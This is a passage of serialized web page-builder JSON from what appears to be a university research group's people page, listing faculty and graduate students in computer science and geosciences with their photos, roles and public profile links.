Professor<\\/span><\\/p>\"},\"domuuid\":\"182-c430\"},{\"name\":\"hop-text\",\"parentId\":\"182-c52\",\"index\":1,\"id\":\"182-c56\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<\\/p>\"},\"domuuid\":\"182-c431\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/taylor-shelton-28a4b3291\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/cas.gsu.edu\\/profile\\/taylor-shelton\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?user=WFA1Ry8AAAAJ&hl=en\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false,\"lightboxMedia\":\"\"}}]},\"parentId\":\"182-c52\",\"index\":1,\"id\":\"182-c57\",\"partialId\":182,\"styleRef\":977,\"type\":\"content\",\"domuuid\":\"182-c432\"}],\"styleRef\":972,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c58\",\"parentId\":\"182-c3\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c58\",\"index\":0,\"id\":\"182-c59\",\"partialId\":182,\"styleRef\":973,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2023\\/10\\/Hassan-Babaie-300x300-1.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1634,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c58\",\"index\":0,\"id\":\"182-c60\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Hassan Babaie\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c58\",\"index\":2,\"id\":\"182-c61\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p>Associate Professor<br><\\/p>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c58\",\"index\":1,\"id\":\"182-c62\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/geosciences.gsu.edu\\/profile\\/hassan-babaie\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.researchgate.net\\/profile\\/Hassan-Babaie\\/4\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false,\"lightboxMedia\":\"\"}}]},\"parentId\":\"182-c58\",\"index\":1,\"id\":\"182-c63\",\"partialId\":182,\"styleRef\":977,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":972,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c64\",\"parentId\":\"182-c3\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c64\",\"index\":0,\"id\":\"182-c65\",\"partialId\":182,\"styleRef\":973,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2023\\/10\\/cropped-cropped-Faris-e1697216253732.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1814,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c64\",\"index\":0,\"id\":\"182-c66\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Faris Hawamdeh<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c64\",\"index\":2,\"id\":\"182-c67\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p>Academic Professional<br><\\/p>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c64\",\"index\":1,\"id\":\"182-c68\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/faris-hawamdeh\\/?trk=public_profile_publication_contributor-image\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/cas.gsu.edu\\/profile\\/faris-hawamdeh\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.researchgate.net\\/profile\\/Faris-Hawamdeh\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false,\"lightboxMedia\":\"\"}}]},\"parentId\":\"182-c64\",\"index\":1,\"id\":\"182-c69\",\"partialId\":182,\"styleRef\":977,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":972,\"type\":\"content\"}],\"id\":\"182-c3\",\"parentId\":\"182-c2\",\"partialId\":182,\"styleRef\":971,\"type\":\"content\"}],\"id\":\"182-c2\",\"parentId\":\"182-c1\",\"partialId\":182,\"slots\":{\"header\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":80,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-heading\",\"props\":{\"content\":\"Faculty\"},\"id\":\"182-c72\",\"parentId\":\"182-c71\",\"partialId\":182,\"styleRef\":986,\"type\":\"content\"}],\"id\":\"182-c71\",\"parentId\":\"182-c70\",\"partialId\":182,\"styleRef\":985,\"type\":\"content\"}],\"id\":\"182-c70\",\"parentId\":\"182-c2\",\"partialId\":182,\"styleRef\":984,\"type\":\"content\"}]},\"styleRef\":970,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Grads\",\"attrs\":{\"id\":\"grads\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"id\":\"182-c75\",\"parentId\":\"182-c74\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c75\",\"index\":0,\"id\":\"182-c76\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2023\\/10\\/cropped-cropped-cropped-282038166_2492815234187345_4129762528023780269_n-e1697205710763.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1742,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c75\",\"index\":0,\"id\":\"182-c77\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Sundos Al Subhi<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c75\",\"index\":2,\"id\":\"182-c78\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>PhD Candidate<br><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c75\",\"index\":3,\"id\":\"182-c79\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/sundos-al-subhi-88bb97150\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c75\",\"index\":1,\"id\":\"182-c80\",\"partialId\":182,\"styleRef\":855,\"type\":\"content\",\"domuuid\":\"5-c303\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c81\",\"parentId\":\"182-c74\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c81\",\"index\":0,\"id\":\"182-c82\",\"partialId\":182,\"styleRef\":849,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/06\\/cropped-cropped-cropped-IMG_1240-scaled-1-e1697205818731.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1744,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c81\",\"index\":0,\"id\":\"182-c83\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Aaja Christie<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c81\",\"index\":2,\"id\":\"182-c84\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>PhD Candidate<br><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c81\",\"index\":3,\"id\":\"182-c85\",\"partialId\":182,\"styleRef\":901,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/aaja-christie-17573657\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c81\",\"index\":1,\"id\":\"182-c86\",\"partialId\":182,\"styleRef\":853,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c87\",\"parentId\":\"182-c74\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c87\",\"index\":0,\"id\":\"182-c88\",\"partialId\":182,\"styleRef\":856,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/04\\/cropped-cropped-Emma-e1697205932363.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1745,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c87\",\"index\":0,\"id\":\"182-c89\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Emma McDaniel<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c87\",\"index\":2,\"id\":\"182-c90\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>PhD Candidate<br><\\/p>\"}},{\"name\":\"hop-text\",\"styleRef\":852,\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"},\"parentId\":\"182-c87\",\"index\":1,\"id\":\"182-c91\",\"partialId\":182,\"type\":\"content\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/emmamcdaniel\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?user=Cwt8OwkAAAAJ&hl=en\"},\"name\":\"socicon\\/googlescholar\"}]},\"parentId\":\"182-c87\",\"index\":1,\"id\":\"182-c92\",\"partialId\":182,\"styleRef\":857,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c93\",\"parentId\":\"182-c74\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c93\",\"index\":0,\"id\":\"182-c94\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2023\\/09\\/cropped-cropped-sara-edwards1-e1697206932891.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1754,\"size\":\"\"},\"domuuid\":\"182-c79\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c93\",\"index\":0,\"id\":\"182-c95\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Sara Edwards<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c93\",\"index\":2,\"id\":\"182-c96\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>PhD Student, MS Graduate<br><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c93\",\"index\":3,\"id\":\"182-c97\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/sara-edwards-691b8331\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c93\",\"index\":1,\"id\":\"182-c98\",\"partialId\":182,\"styleRef\":855,\"type\":\"content\",\"domuuid\":\"5-c303\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c99\",\"parentId\":\"182-c74\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c99\",\"index\":0,\"id\":\"182-c100\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/04\\/cropped-cropped-cropped-cropped-Ryan-e1697207029774.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1756,\"size\":\"\"},\"domuuid\":\"182-c79\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c99\",\"index\":0,\"id\":\"182-c101\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Ryan Garland<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c99\",\"index\":2,\"id\":\"182-c102\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>PhD Student, MS Graduate<br><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c99\",\"index\":3,\"id\":\"182-c103\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/ryan-g-aa71a0163\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c99\",\"index\":1,\"id\":\"182-c104\",\"partialId\":182,\"styleRef\":855,\"type\":\"content\",\"domuuid\":\"182-c83\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c105\",\"parentId\":\"182-c74\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c105\",\"index\":0,\"id\":\"182-c106\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/04\\/cropped-cropped-cropped-Jean-e1697206801281.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1750,\"size\":\"\"},\"domuuid\":\"182-c79\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c105\",\"index\":0,\"id\":\"182-c107\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Jean Guo\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c105\",\"index\":2,\"id\":\"182-c108\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>PhD Student<\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c105\",\"index\":3,\"id\":\"182-c109\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c110\",\"parentId\":\"182-c74\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c110\",\"index\":0,\"id\":\"182-c111\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2023\\/09\\/cropped-cropped-anupam-e1697206626249.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1747,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c110\",\"index\":0,\"id\":\"182-c112\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Anupam Sarker<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c110\",\"index\":2,\"id\":\"182-c113\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>PhD Student<br><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c110\",\"index\":3,\"id\":\"182-c114\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/anupam-sarker-b164b412a\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c110\",\"index\":1,\"id\":\"182-c115\",\"partialId\":182,\"styleRef\":855,\"type\":\"content\",\"domuuid\":\"5-c303\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c116\",\"parentId\":\"182-c74\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c116\",\"index\":0,\"id\":\"182-c117\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-cropped-Ardavan-e1697206676649.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1748,\"size\":\"\"},\"domuuid\":\"182-c79\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c116\",\"index\":0,\"id\":\"182-c118\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Ardavan Sassani\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c116\",\"index\":2,\"id\":\"182-c119\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>PhD Student, MS Graduate<br><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c116\",\"index\":3,\"id\":\"182-c120\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/ardavansassani\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?user=9KRgkCcAAAAJ&hl=en&oi=ao\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false,\"lightboxMedia\":\"\"}}]},\"parentId\":\"182-c116\",\"index\":1,\"id\":\"182-c121\",\"partialId\":182,\"styleRef\":855,\"type\":\"content\",\"domuuid\":\"5-c303\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c122\",\"parentId\":\"182-c74\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c122\",\"index\":0,\"id\":\"182-c123\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2023\\/09\\/cropped-Screen-Shot-2023-09-26-at-9.33.41-PM-e1697207183631.png\",\"caption\":{\"text\":\"\"},\"imageId\":1758,\"size\":\"\"},\"domuuid\":\"182-c79\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c122\",\"index\":0,\"id\":\"182-c124\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Sikiru Bayo Abdulkareem\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c122\",\"index\":2,\"id\":\"182-c125\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p><span style=\\\"color: rgb(64, 85, 169); font-family: Open Sans; font-size: 16px; font-weight: 400;\\\">Master\'s Student<\\/span><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c122\",\"index\":3,\"id\":\"182-c126\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"www.linkedin.com\\/in\\/bayonle\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c122\",\"index\":1,\"id\":\"182-c127\",\"partialId\":182,\"styleRef\":855,\"type\":\"content\",\"domuuid\":\"182-c83\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c128\",\"parentId\":\"182-c74\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c128\",\"index\":0,\"id\":\"182-c129\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-cropped-Basit-e1697206890221.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1752,\"size\":\"\"},\"domuuid\":\"182-c79\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c128\",\"index\":0,\"id\":\"182-c130\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Basit Damilare Amuda\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c128\",\"index\":2,\"id\":\"182-c131\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>Master\'s Student<br><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c128\",\"index\":3,\"id\":\"182-c132\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"http:\\/\\/linkedin.com\\/in\\/basit-amuda-227098238\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c128\",\"index\":1,\"id\":\"182-c133\",\"partialId\":182,\"styleRef\":855,\"type\":\"content\",\"domuuid\":\"5-c303\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c140\",\"parentId\":\"182-c74\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c140\",\"index\":0,\"id\":\"182-c141\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2024\\/11\\/Siv-photo.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1860,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c140\",\"index\":0,\"id\":\"182-c142\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Sivgech Heang<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c140\",\"index\":2,\"id\":\"182-c143\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>Master\'s Student<br><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c140\",\"index\":3,\"id\":\"182-c144\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/sivgech-heang-91842618a\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c140\",\"index\":1,\"id\":\"182-c145\",\"partialId\":182,\"styleRef\":855,\"type\":\"content\",\"domuuid\":\"5-c303\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c134\",\"parentId\":\"182-c74\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c134\",\"index\":0,\"id\":\"182-c135\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2023\\/10\\/cropped-cropped-md-shah-sayem-e1697207514119.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1761,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c134\",\"index\":0,\"id\":\"182-c136\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Shah Md Shahnewaz Sayem\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c134\",\"index\":2,\"id\":\"182-c137\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>Master\'s Student<br><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c134\",\"index\":3,\"id\":\"182-c138\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/shah-md-shahnewaz-sayem-767540154\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c134\",\"index\":1,\"id\":\"182-c139\",\"partialId\":182,\"styleRef\":855,\"type\":\"content\",\"domuuid\":\"5-c303\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c228\",\"parentId\":\"182-c74\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c228\",\"index\":0,\"id\":\"182-c229\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2024\\/11\\/Shreyatadipaneni.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1875,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c228\",\"index\":0,\"id\":\"182-c230\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Shreya Tadipaneni<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c228\",\"index\":2,\"id\":\"182-c231\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>Master\'s Student<br><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c228\",\"index\":3,\"id\":\"182-c232\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/shreya-tadipaneni-22a4451a6\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c228\",\"index\":1,\"id\":\"182-c233\",\"partialId\":182,\"styleRef\":855,\"type\":\"content\",\"domuuid\":\"5-c303\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c234\",\"parentId\":\"182-c74\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c234\",\"index\":0,\"id\":\"182-c235\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2024\\/11\\/Anshul-Gupta.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1876,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c234\",\"index\":0,\"id\":\"182-c236\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Anshul 